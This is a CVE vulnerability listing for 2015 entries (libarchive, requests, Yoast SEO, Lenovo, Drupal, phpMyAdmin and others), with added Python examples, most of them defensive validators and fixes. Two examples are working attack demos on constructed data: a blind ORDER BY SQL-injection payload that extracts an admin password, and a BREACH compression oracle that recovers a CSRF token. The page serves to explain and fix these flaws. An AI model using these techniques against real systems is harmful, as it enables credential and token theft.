Each entry below is one row of the listing. The first line of an entry gives, in this order:

# | CVE ID | CWE ID | # of Exploits | Vulnerability Type(s) | Publish Date | Update Date | Score | Gained Access Level | Access | Complexity | Authentication | Conf. | Integ. | Avail.

An empty cell is shown as "-". Score, Access, Complexity, Authentication and the Conf./Integ./Avail. columns are CVSS v2 values. The second line of an entry is the vulnerability description.

36651 | CVE-2015-2304 | 22 | - | Dir. Trav. | 2015-03-15 | 2018-10-30 | 6.4 | None | Remote | Low | Not required | None | Partial | Partial
Absolute path traversal vulnerability in bsdcpio in libarchive 3.1.2 and earlier allows remote attackers to write to arbitrary files via a full pathname in an archive.

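The bsdcpio entry is one instance of a general extraction rule: an archive entry name must not be used as a filesystem path until it has been checked against the destination directory. The following is an added example of that check, written here for this page and not taken from libarchive; `dest_dir` and the entry names are constructed inputs.

```python
import posixpath
import re

_DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")


def safe_member_path(dest_dir: str, member: str) -> str:
    """Map an archive entry name to its extraction target under dest_dir.

    Raises ValueError for the names an extractor must refuse before touching
    the filesystem: absolute names (the bsdcpio case above), Windows drive
    prefixes, and any '..' sequence that climbs out of dest_dir.
    """
    if not member or "\x00" in member:
        raise ValueError("empty or NUL-containing entry name")
    name = member.replace("\\", "/")              # backslashes count as separators too
    if name.startswith("/") or _DRIVE_PREFIX.match(name):
        raise ValueError("absolute path in archive entry: %r" % member)
    norm = posixpath.normpath(name)               # collapses './' and 'a/../'
    if norm == ".." or norm.startswith("../"):
        raise ValueError("entry escapes destination: %r" % member)
    dest = posixpath.normpath(dest_dir)
    target = dest if norm == "." else posixpath.join(dest, norm)
    # Independent containment check on the joined result, in case a rule above is ever relaxed.
    if target != dest and not target.startswith(dest + "/"):
        raise ValueError("entry escapes destination: %r" % member)
    return target


def is_safe_member(dest_dir: str, member: str) -> bool:
    """Filter form of the same check, for screening an entry list before extraction."""
    try:
        safe_member_path(dest_dir, member)
        return True
    except ValueError:
        return False
```

This covers absolute, drive-prefixed and `..` names. It does not cover symlink entries (an archive that first creates a symlink pointing outside the destination and then writes through it), which need a separate check at extraction time; libarchive exposes ARCHIVE_EXTRACT_SECURE_SYMLINKS and ARCHIVE_EXTRACT_SECURE_NODOTDOT for those cases, and later releases added an ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATH flag for the case in this entry.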
36652 | CVE-2015-2298 | 200 | - | +Info | 2018-01-12 | 2018-01-29 | 5.0 | None | Remote | Low | Not required | Partial | None | None
node/utils/ExportEtherpad.js in Etherpad 1.5.x before 1.5.2 might allow remote attackers to obtain sensitive information by leveraging an improper substring check when exporting a padID.

36653 | CVE-2015-2297 | 476 | - | DoS | 2017-10-06 | 2017-10-13 | 5.0 | None | Remote | Low | Not required | None | None | Partial
nanohttp in libcsoap allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Authorization header.

36654 | CVE-2015-2296 | - | - | - | 2015-03-18 | 2016-07-15 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial
The resolve_redirects function in sessions.py in requests 2.1.0 through 2.5.3 allows remote attackers to conduct session fixation attacks via a cookie without a host value in a redirect.

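The requests entry describes a cookie-scoping mistake while following redirects: a Set-Cookie without a Domain attribute is host-only for the host that sent it, but a client that stores it against the redirect target instead lets any site that can redirect you plant a cookie for that target. The following is an added example that reproduces both behaviours with the standard-library cookie jar; it is not requests' code, and the hosts, URLs and redirect response are constructed.

```python
import email.message
import http.cookiejar
import urllib.request


class RedirectResponse:
    """Minimal response stand-in: http.cookiejar only needs .info() -> headers."""

    def __init__(self, headers):
        self._headers = email.message.Message()
        for name, value in headers:
            self._headers[name] = value

    def info(self):
        return self._headers


def cookie_header_after_redirect(origin_url, redirect_response, location, attribute_to_target):
    """Simulate one redirect hop and return the Cookie header that would be sent
    to `location` (None if no stored cookie applies).

    attribute_to_target=True reproduces the flaw in the entry above: cookies in
    the redirect response are recorded against the *next* host. With False, a
    cookie without a Domain attribute stays with the host that actually set it.
    """
    jar = http.cookiejar.CookieJar()
    owner = location if attribute_to_target else origin_url
    jar.extract_cookies(redirect_response, urllib.request.Request(owner))
    nxt = urllib.request.Request(location)
    jar.add_cookie_header(nxt)
    return nxt.get_header("Cookie")


# Constructed scenario: a link on attacker.example redirects to bank.example and
# tries to plant a session identifier along the way (session fixation).
ORIGIN = "https://attacker.example/go"
TARGET = "https://bank.example/login"
ATTACKER_HOP = RedirectResponse([
    ("Location", TARGET),
    ("Set-Cookie", "sessionid=attacker-chosen; Path=/"),
])
```

With `attribute_to_target=True` the attacker's cookie is sent to bank.example on the very next request; with `False` it is stored for attacker.example only and bank.example never sees it. The same rule applies to any client that follows redirects itself: extract cookies using the URL of the response that carried them, not the URL you are about to fetch.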
36655 | CVE-2015-2295 | 352 | - | CSRF | 2015-04-10 | 2019-05-30 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial
Cross-site request forgery (CSRF) vulnerability in system_firmware_restorefullbackup.php in the WebGUI in pfSense before 2.2.1 allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary files via the deletefile parameter.

36656 | CVE-2015-2294 | 79 | - | XSS | 2015-04-01 | 2019-05-30 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in the WebGUI in pfSense before 2.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) zone parameter to status_captiveportal.php; (2) if or (3) dragtable parameter to firewall_rules.php; (4) queue parameter in an add action to firewall_shaper.php; (5) id parameter in an edit action to services_unbound_acls.php; or (6) filterlogentries_time, (7) filterlogentries_sourceipaddress, (8) filterlogentries_sourceport, (9) filterlogentries_destinationipaddress, (10) filterlogentries_interfaces, (11) filterlogentries_destinationport, (12) filterlogentries_protocolflags, or (13) filterlogentries_qty parameter to diag_logs_filter.php.

36657 | CVE-2015-2293 | 352 | - | Sql CSRF | 2015-03-17 | 2015-03-18 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial
Multiple cross-site request forgery (CSRF) vulnerabilities in admin/class-bulk-editor-list-table.php in the WordPress SEO by Yoast plugin before 1.5.7, 1.6.x before 1.6.4, and 1.7.x before 1.7.4 for WordPress allow remote attackers to hijack the authentication of certain users for requests that conduct SQL injection attacks via the (1) order_by or (2) order parameter in the wpseo_bulk-editor page.

36658 | CVE-2015-2292 | 89 | - | Exec Code Sql CSRF | 2015-03-17 | 2016-12-02 | 6.5 | None | Remote | Low | Single system | Partial | Partial | Partial
Multiple SQL injection vulnerabilities in admin/class-bulk-editor-list-table.php in the WordPress SEO by Yoast plugin before 1.5.7, 1.6.x before 1.6.4, and 1.7.x before 1.7.4 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) order_by or (2) order parameter in the wpseo_bulk-editor page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands.

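The two Yoast entries above (36657 and 36658) share one root cause: sort parameters spliced straight into an ORDER BY clause. Identifiers and sort directions cannot be bound as query parameters, so the fix is an allowlist, not escaping. The following is an added example of the vulnerable pattern beside its fix, with a blind-extraction payload that shows why ORDER BY injection matters even when it cannot return data directly; it is not the plugin's code, and the SQLite schema and data are constructed.

```python
import sqlite3

# Identifiers cannot be bound as parameters, so ORDER BY input must be allowlisted.
ALLOWED_ORDER_BY = {"id", "post_title", "post_date"}
ALLOWED_ORDER = {"ASC", "DESC"}


def setup_db():
    """Constructed schema in the spirit of a WordPress posts/users pair."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts(id INTEGER, post_title TEXT, post_date TEXT);
        INSERT INTO posts VALUES (1, 'zebra', '2015-03-01'),
                                 (2, 'apple', '2015-03-02'),
                                 (3, 'mango', '2015-03-03');
        CREATE TABLE users(id INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret-hash');
    """)
    return conn


def list_posts_vulnerable(conn, order_by, order):
    """Raw interpolation of both sort parameters, as in the entries above."""
    return [row[0] for row in conn.execute(f"SELECT id FROM posts ORDER BY {order_by} {order}")]


def list_posts_fixed(conn, order_by, order):
    """Same query, with both parameters checked against allowlists first."""
    if order_by not in ALLOWED_ORDER_BY:
        raise ValueError(f"bad order_by: {order_by!r}")
    order = order.upper()
    if order not in ALLOWED_ORDER:
        raise ValueError(f"bad order: {order!r}")
    return [row[0] for row in conn.execute(f"SELECT id FROM posts ORDER BY {order_by} {order}")]


def leak_password_char_vulnerable(conn, position):
    """Blind extraction through the sort order: the CASE expression sorts by title
    when the guess is right and by id otherwise, so the row order is the oracle."""
    by_title = list_posts_vulnerable(conn, "post_title", "ASC")      # [2, 3, 1]
    for guess in "abcdefghijklmnopqrstuvwxyz0123456789-":
        payload = (f"(CASE WHEN (SELECT substr(user_pass,{position},1) FROM users "
                   f"WHERE user_login='admin')='{guess}' THEN post_title ELSE id END)")
        if list_posts_vulnerable(conn, payload, "ASC") == by_title:
            return guess
    return None


def leak_password_vulnerable(conn, length):
    """Recover `length` characters of the admin's stored password, one per query loop."""
    return "".join(leak_password_char_vulnerable(conn, i) or "?" for i in range(1, length + 1))


def fixed_rejects(conn, order_by, order):
    """True if the allowlisted version refuses the given sort parameters."""
    try:
        list_posts_fixed(conn, order_by, order)
        return False
    except ValueError:
        return True
```

The CSRF half of the chain (36657) is a separate control: a per-user nonce checked before the query runs (WordPress's `check_admin_referer()` does this for admin pages) stops an unauthenticated attacker from driving the injection through an administrator's browser, but the allowlist is what removes the injection itself.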
36659 | CVE-2015-2289 | 79 | - | XSS | 2015-03-23 | 2018-10-09 | 3.5 | None | Remote | Medium | Single system | None | Partial | None
Cross-site scripting (XSS) vulnerability in templates/2k11/admin/entries.tpl in Serendipity before 2.0.1 allows remote authenticated editors to inject arbitrary web script or HTML via the serendipity[cat][name] parameter to serendipity_admin.php, when creating a new category.

36660 | CVE-2015-2286 | 200 | - | +Info | 2016-03-19 | 2016-03-22 | 4.3 | None | Remote | Medium | Not required | Partial | None | None
lms/templates/footer-edx-new.html in Open edX edx-platform before 2015-01-29 does not properly restrict links on the password-reset page, which allows user-assisted remote attackers to discover password-reset tokens by reading a referer log after a victim navigates from this page to a social-sharing site.

36661 | CVE-2015-2278 | 119 | - | DoS Overflow | 2015-06-02 | 2018-10-09 | 5.0 | None | Remote | Low | Not required | None | None | Partial
The LZH decompression implementation (CsObjectInt::BuildHufTree function in vpa108csulzh.cpp) in SAP MaxDB 7.5 and 7.6, Netweaver Application Server ABAP, Netweaver Application Server Java, Netweaver RFC SDK, GUI, RFC SDK, SAPCAR archive tool, and other products allows context-dependent attackers to cause a denial of service (out-of-bounds read) via unspecified vectors, related to look-ups of non-simple codes, aka SAP Security Note 2124806, 2121661, 2127995, and 2125316.

36662 | CVE-2015-2275 | 79 | 1 | XSS | 2015-03-12 | 2018-10-09 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy.

36663 | CVE-2015-2273 | 79 | - | XSS | 2015-06-01 | 2015-06-02 | 3.5 | None | Remote | Medium | Single system | None | Partial | None
Cross-site scripting (XSS) vulnerability in mod/quiz/report/statistics/statistics_question_table.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to inject arbitrary web script or HTML by leveraging the student role for a crafted quiz response.

36664 | CVE-2015-2272 | 264 | - | Bypass | 2015-06-01 | 2017-03-23 | 4.0 | None | Remote | Low | Single system | None | Partial | None
login/token.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to bypass a forced-password-change requirement by creating a web-services token.

36665 | CVE-2015-2271 | 264 | - | Bypass | 2015-06-01 | 2015-06-02 | 4.0 | None | Remote | Low | Single system | None | Partial | None
tag/user.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 does not consider the moodle/tag:flag capability before proceeding with a flaginappropriate action, which allows remote authenticated users to bypass intended access restrictions via the "Flag as inappropriate" feature.

36666 | CVE-2015-2270 | 17 | - | +Info | 2015-06-01 | 2015-06-02 | 4.3 | None | Remote | Medium | Not required | Partial | None | None
lib/moodlelib.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4, when the theme uses the blocks-regions feature, establishes the course state at an incorrect point in the login-validation process, which allows remote attackers to obtain sensitive course information via unspecified vectors.

36667 | CVE-2015-2269 | 79 | - | XSS | 2015-06-01 | 2015-06-02 | 3.5 | None | Remote | Medium | Single system | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in lib/javascript-static.js in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allow remote authenticated users to inject arbitrary web script or HTML via a (1) alt or (2) title attribute in an IMG element.

36668 | CVE-2015-2268 | 399 | - | DoS | 2015-06-01 | 2015-06-02 | 6.8 | None | Remote | Low | Single system | None | None | Complete
filter/urltolink/filter.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to cause a denial of service (CPU consumption or partial outage) via a crafted string that is matched against an improper regular expression.

36669 | CVE-2015-2267 | 284 | - | Bypass | 2015-06-01 | 2015-06-02 | 4.0 | None | Remote | Low | Single system | None | Partial | None
mdeploy.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to bypass intended access restrictions and extract archives to arbitrary directories via a crafted dataroot value.

36670 | CVE-2015-2266 | 200 | - | +Info | 2015-06-01 | 2015-06-02 | 4.0 | None | Remote | Low | Single system | Partial | None | None
message/index.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 does not consider the moodle/site:readallmessages capability before accessing arbitrary conversations, which allows remote authenticated users to obtain sensitive personal-contact and unread-message-count information via a modified URL.

36671 | CVE-2015-2264 | - | - | +Priv | 2015-03-12 | 2015-03-13 | 6.9 | None | Local | Medium | Not required | Complete | Complete | Complete
Multiple untrusted search path vulnerabilities in (1) EQATEC.Analytics.Monitor.Win32_vc100.dll and (2) EQATEC.Analytics.Monitor.Win32_vc100-x64.dll in Telerik Analytics Monitor Library before 3.2.125 allow local users to gain privileges via a Trojan horse (a) csunsapi.dll, (b) swift.dll, (c) nfhwcrhk.dll, or (d) surewarehook.dll file in an unspecified directory.

36672 | CVE-2015-2263 | 264 | - | +Info | 2017-03-23 | 2017-03-29 | 2.1 | None | Local | Low | Not required | Partial | None | None
Cloudera Manager 4.x, 5.0.x before 5.0.6, 5.1.x before 5.1.5, 5.2.x before 5.2.5, and 5.3.x before 5.3.3 uses global read permissions for files in its configuration directory when starting YARN NodeManager, which allows local users to obtain sensitive information by reading the files, as demonstrated by yarn.keytab or ssl-server.xml in /var/run/cloudera-scm-agent/process.

36673 | CVE-2015-2255 | 19 | - | DoS | 2017-06-08 | 2017-06-16 | 4.3 | None | Remote | Medium | Not required | None | None | Partial
Huawei AR1220 routers with software before V200R005SPH006 allow remote attackers to cause a denial of service (board reset) via vectors involving a large amount of traffic from the GE port to the FE port.

36674 | CVE-2015-2253 | 200 | - | +Info | 2017-06-08 | 2017-06-20 | 3.5 | None | Remote | Medium | Single system | Partial | None | None
The XML interface in Huawei OceanStor UDS devices with software before V100R002C01SPC102 allows remote authenticated users to obtain sensitive information via a crafted XML document.

36675 | CVE-2015-2251 | 200 | - | +Info | 2017-06-08 | 2017-06-20 | 5.0 | None | Remote | Low | Not required | Partial | None | None
The DeviceManager in Huawei OceanStor UDS devices with software before V100R002C01SPC102 might allow remote attackers to obtain sensitive information via a crafted UDS patch with JavaScript.

36676 | CVE-2015-2250 | 79 | - | XSS | 2015-05-15 | 2018-10-09 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in concrete5 before 5.7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) banned_word[] parameter to index.php/dashboard/system/conversations/bannedwords/success, (2) channel parameter to index.php/dashboard/reports/logs/view, (3) accessType parameter to index.php/tools/required/permissions/access_entity, (4) msCountry parameter to index.php/dashboard/system/multilingual/setup/load_icon, arHandle parameter to (5) design/submit or (6) design in index.php/ccm/system/dialogs/area/design/submit, (7) pageURL to index.php/dashboard/pages/single, (8) SEARCH_INDEX_AREA_METHOD parameter to index.php/dashboard/system/seo/searchindex/updated, (9) unit parameter to index.php/dashboard/system/optimization/jobs/job_scheduled, (10) register_notification_email parameter to index.php/dashboard/system/registration/open/1, or (11) PATH_INFO to index.php/dashboard/extend/connect/.

36677 | CVE-2015-2248 | 352 | - | CSRF | 2015-05-01 | 2018-03-12 | 6.8 | None | Remote | Medium | Not required | Partial | Partial | Partial
Cross-site request forgery (CSRF) vulnerability in the user portal in Dell SonicWALL Secure Remote Access (SRA) products with firmware before 7.5.1.0-38sv and 8.x before 8.0.0.1-16sv allows remote attackers to hijack the authentication of users for requests that create bookmarks via a crafted request to cgi-bin/editBookmark.

36678 | CVE-2015-2246 | 200 | - | +Info | 2017-04-02 | 2017-04-07 | 4.3 | None | Remote | Medium | Not required | Partial | None | None
The MeWidget module on Huawei P7 smartphones with software P7-L10 V100R001C00B136 and earlier versions could lead to the disclosure of contact information.

36679 | CVE-2015-2245 | 20 | - | DoS | 2017-06-27 | 2017-07-03 | 5.0 | None | Remote | Low | Not required | None | None | Partial
Huawei Ascend P7 allows remote attackers to cause a denial of service (phone process crash).

36680 | CVE-2015-2244 | 79 | - | XSS | 2015-03-09 | 2015-03-10 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in Webshop hun 1.062S allow remote attackers to inject arbitrary web script or HTML via the (1) param, (2) center, (3) lap, (4) termid, or (5) nyelv_id parameter to index.php.

36681 | CVE-2015-2241 | 79 | - | XSS | 2015-03-12 | 2016-12-02 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Cross-site scripting (XSS) vulnerability in the contents function in admin/helpers.py in Django before 1.7.6 and 1.8 before 1.8b2 allows remote attackers to inject arbitrary web script or HTML via a model attribute in ModelAdmin.readonly_fields, as demonstrated by a @property.

36682 | CVE-2015-2239 | 19 | - | XSS | 2015-03-08 | 2016-12-02 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Google Chrome before 41.0.2272.76, when Instant Extended mode is used, does not properly consider the interaction between the "1993 search" features and restore-from-disk RELOAD transitions, which makes it easier for remote attackers to spoof the address bar for a search-results page by leveraging (1) a compromised search engine or (2) an XSS vulnerability in a search engine, a different vulnerability than CVE-2015-1231.

36683 | CVE-2015-2235 | 310 | - | - | 2015-03-06 | 2015-03-09 | 5.0 | None | Remote | Low | Not required | None | Partial | None
Secure Transport in Apple iOS through 8.1.3, Apple OS X through 10.10.2, and Apple TV through 7.0.3 does not properly restrict TLS state transitions, which makes it easier for remote attackers to conduct cipher-downgrade attacks to EXPORT_RSA ciphers via crafted TLS traffic, related to the "FREAK" issue, a different vulnerability than CVE-2015-0204 and CVE-2015-1637.

36684 | CVE-2015-2234 | 362 | - | +Priv | 2015-05-12 | 2017-01-02 | 6.9 | None | Local | Medium | Not required | Complete | Complete | Complete
Race condition in Lenovo System Update (formerly ThinkVantage System Update) before 5.06.0034 uses world-writable permissions for the update files directory, which allows local users to gain privileges by writing to an update file after the signature is validated.

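The Lenovo entry is a time-of-check/time-of-use race: the updater validates a signature on a file by path, then later re-reads the same path, and because the directory is world-writable any local user can swap the file in between. The following is an added example, not Lenovo's code, showing the vulnerable check-then-use shape beside the fix (read once, verify the bytes you hold, run those bytes) and the directory-permission check that would have flagged the root cause. The signing key, the HMAC standing in for the vendor signature, the temporary directory and the "race" hook are all constructed for the demo.

```python
import hashlib
import hmac
import os
import stat
import tempfile

VENDOR_KEY = b"demo-signing-key"   # stand-in: HMAC-SHA256 plays the role of the vendor signature


def sign(payload: bytes) -> str:
    return hmac.new(VENDOR_KEY, payload, hashlib.sha256).hexdigest()


def verify(payload: bytes, signature: str) -> bool:
    return hmac.compare_digest(sign(payload), signature)


def is_world_writable(path: str) -> bool:
    """True if any local user may create or replace files here (the root cause above).
    A sticky-bit directory (like /tmp) still lets others create files, but not
    replace ours, so it is not flagged."""
    mode = os.stat(path).st_mode
    return bool(mode & stat.S_IWOTH) and not bool(mode & stat.S_ISVTX)


def install_vulnerable(path: str, signature: str, race) -> bytes:
    """Check-then-use: validates the file by path, then re-reads it by path.
    `race` is a hook standing in for another local user acting in between."""
    with open(path, "rb") as f:
        if not verify(f.read(), signature):
            raise PermissionError("bad signature")
    race()
    with open(path, "rb") as f:
        return f.read()              # "executes" whatever is on disk *now*


def install_fixed(path: str, signature: str, race) -> bytes:
    """Read once into private memory, verify those bytes, use those bytes."""
    with open(path, "rb") as f:
        payload = f.read()
    if not verify(payload, signature):
        raise PermissionError("bad signature")
    race()                           # the swap no longer matters
    return payload


def run_demo() -> dict:
    """Constructed scenario: a world-writable update directory, a signed update,
    and a local attacker who swaps the file right after the signature check."""
    legit, evil = b"legit-installer", b"attacker-installer"
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o777)                           # reproduce the unsafe directory mode
        path = os.path.join(d, "update.bin")
        with open(path, "wb") as f:
            f.write(legit)
        signature = sign(legit)

        def swap():
            with open(path, "wb") as f:
                f.write(evil)

        result = {"dir_world_writable": is_world_writable(d)}
        result["vulnerable_runs"] = install_vulnerable(path, signature, swap)
        with open(path, "wb") as f:
            f.write(legit)                           # reset for the second run
        result["fixed_runs"] = install_fixed(path, signature, swap)
    return result
```

In a real updater the bytes should additionally be copied into a directory only the privileged service can write before anything is launched from them; the point here is that verification must bind to the data that is actually used, never to a path that someone else can redirect.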
36685 | CVE-2015-2230 | 79 | - | XSS | 2019-05-30 | 2019-05-31 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Synacor Zimbra Collaboration Server 8.x before 8.7.0 has Reflected XSS in admin console.

36686 | CVE-2015-2223 | 79 | - | XSS | 2015-04-14 | 2018-10-09 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in the web-based console management interface in Palo Alto Networks Traps (formerly Cyvera Endpoint Protection) 3.1.2.1546 allow remote attackers to inject arbitrary web script or HTML via the (1) Arguments, (2) FileName, or (3) URL parameter in a SOAP request.

36687 | CVE-2015-2222 | 399 | - | DoS | 2015-05-12 | 2017-01-02 | 5.0 | None | Remote | Low | Not required | None | None | Partial
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (crash) via a crafted petite packed file.

36688 | CVE-2015-2221 | 399 | - | DoS | 2015-05-12 | 2017-01-02 | 5.0 | None | Remote | Low | Not required | None | None | Partial
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (infinite loop) via a crafted y0da cryptor file.

36689 | CVE-2015-2220 | 79 | - | XSS | 2015-03-05 | 2018-10-09 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in the Ninja Forms plugin before 2.8.9 for WordPress allow (1) remote attackers to inject arbitrary web script or HTML via the ninja_forms_field_1 parameter in a ninja_forms_ajax_submit action to wp-admin/admin-ajax.php or (2) remote administrators to inject arbitrary web script or HTML via the fields[1] parameter to wp-admin/post.php.

36690 | CVE-2015-2218 | 79 | 1 | XSS | 2015-03-05 | 2016-12-02 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in the wp_ajax_save_item function in wonderpluginaudio.php in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) item[name] or (2) item[customcss] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or the itemid parameter in the (3) wonderplugin_audio_show_item or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php.

36691 | CVE-2015-2217 | 79 | - | XSS | 2015-03-10 | 2018-10-09 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in Ultimate PHP Board (aka myUPB) before 2.2.8 allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to search.php or (2) avatar parameter to profile.php.

36692 | CVE-2015-2215 | - | - | - | 2015-03-05 | 2015-03-05 | 5.8 | None | Remote | Medium | Not required | Partial | Partial | None
Open redirect vulnerability in the Services single sign-on server helper (services_sso_server_helper) module for Drupal allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified parameters.

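The Drupal SSO helper entry does not say which parameter carried the redirect target, so nothing module-specific can be shown; what can be shown is the validator an open-redirect fix needs, because most naive checks (`startswith("/")`, `"evil" not in url`) are defeated by browser-specific URL spellings. The following is an added example, not the module's code, of a strict same-site redirect check; `our_host` and the test targets are constructed.

```python
from urllib.parse import urlsplit


def is_safe_redirect(target: str, our_host: str) -> bool:
    """Accept only same-site redirect targets.

    Allowed: a path beginning with a single '/', or an absolute http(s) URL whose
    whole authority equals our_host (so no userinfo, no port, no look-alike
    subdomain). Everything else is rejected, including the spellings attackers
    use to smuggle a foreign host past a prefix check: '//evil', '/\\evil',
    'https:evil', 'https://our@evil', and non-http schemes.
    """
    if not target or any(ord(c) < 0x21 or ord(c) == 0x7F for c in target):
        return False                                  # control characters / whitespace
    normalised = target.replace("\\", "/")            # browsers treat '\' as '/'
    try:
        parts = urlsplit(normalised)
    except ValueError:                                # e.g. malformed IPv6 literal
        return False
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: must be a plain path, not scheme-relative ('//host').
        return normalised.startswith("/") and not normalised.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False                                  # javascript:, data:, '//host' with no scheme
    return parts.netloc.lower() == our_host.lower()   # 'https:evil' has an empty netloc and fails here
```

The comparison is deliberately on `netloc` rather than `hostname`, so `https://our.example:443/` is rejected along with `https://our.example@evil.example/`; if a deployment needs explicit ports, add them to the allowed set rather than loosening the match. The same function serves for a `?destination=` parameter, a post-login `next` value, or an SSO return URL.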
36693 | CVE-2015-2214 | 200 | - | +Info | 2015-03-05 | 2016-12-02 | 5.0 | None | Remote | Low | Not required | Partial | None | None
NetCat 5.01 and earlier allows remote attackers to obtain the installation path via the redirect_url parameter to netshop/post.php.

36694 | CVE-2015-2209 | 200 | - | +Info | 2015-03-04 | 2016-12-02 | 5.0 | None | Remote | Low | Not required | Partial | None | None
DLGuard 4.5 allows remote attackers to obtain the installation path via the c parameter to index.php.

36695 | CVE-2015-2206 | 200 | - | +Info CSRF | 2015-03-09 | 2016-12-27 | 5.0 | None | Remote | Low | Not required | Partial | None | None
libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.

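The phpMyAdmin entry has all three BREACH ingredients in one response: a secret (the CSRF token), attacker-controlled text reflected into the same body (the invalid language value), and HTTP compression. DEFLATE replaces a repeated substring with a back-reference, so a reflected guess that matches one more byte of the token compresses a few bits smaller, and the attacker reads the token off the response length one character at a time. The following is an added example of that oracle against a constructed page; it is not phpMyAdmin's code, the page and token are made up, and it compresses with fixed Huffman tables (`Z_FIXED`) so that the measurement is exact rather than statistical.

```python
import zlib

# Constructed response body: a CSRF token in a hidden field and, later in the same
# page, an error message that reflects attacker-controlled input.
PAGE_TEMPLATE = (
    b'<html><body><form method="post" action="/index.php">'
    b'<input type="hidden" name="token" value="%s">'
    b'<input type="submit"></form>'
    b'<p>Unknown language [%s]</p></body></html>'
)
HEX = b"0123456789abcdef"


def render(token: bytes, reflected: bytes) -> bytes:
    """Server side: the only place the real token is used."""
    return PAGE_TEMPLATE % (token, reflected)


def deflate_size(body: bytes) -> int:
    """Size of the raw DEFLATE stream in bytes. Fixed Huffman tables (Z_FIXED) make
    the cost of every symbol constant, so the oracle below is exact."""
    z = zlib.compressobj(9, zlib.DEFLATED, -15, 9, getattr(zlib, "Z_FIXED", 4))
    return len(z.compress(body) + z.flush())


def oracle(token: bytes, reflected: bytes) -> int:
    """Attacker's measurement for one guess. A back-reference one byte longer saves
    7 or 8 bits, which a byte count can round away, so measure under all eight bit
    alignments (each pad byte >= 0x90 costs exactly 9 bits with fixed tables) and sum."""
    return sum(deflate_size(bytes(range(0x90, 0x90 + pad)) + render(token, reflected))
               for pad in range(8))


def recover_token(token: bytes) -> bytes:
    """BREACH: extend the guess one character at a time, anchored on the known
    context 'value="' so the match can only be the token; the right guess is the
    one whose page compresses smallest. `token` is passed only so render() can
    act as the server; the attacker code never reads it."""
    known = b""
    for _ in range(len(token)):
        best = min(HEX, key=lambda c: oracle(token, b'value="' + known + bytes([c])))
        known += bytes([best])
    return known
```

Real servers use dynamic Huffman tables, so a single byte count is noisy and practical attacks repeat measurements or use the "two tries" trick from the original BREACH paper; the leak itself is the same. The mitigations follow from the ingredients: stop reflecting the attacker's input into the response that carries the token (what the phpMyAdmin fix amounts to, per the entry), mask the token with a fresh per-request value so it never repeats byte-for-byte, or disable compression on responses that contain secrets.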
36696 | CVE-2015-2204 | 200 | - | Bypass +Info | 2018-02-01 | 2018-02-15 | 5.0 | None | Remote | Low | Not required | Partial | None | None
Evergreen before 2.5.9, 2.6.x before 2.6.7, and 2.7.x before 2.7.4 allows remote attackers to bypass an intended access restriction and obtain sensitive information about org unit settings by leveraging failure of open-ils.actor.ou_setting.ancestor_default to enforce view_perm when no auth token is provided.

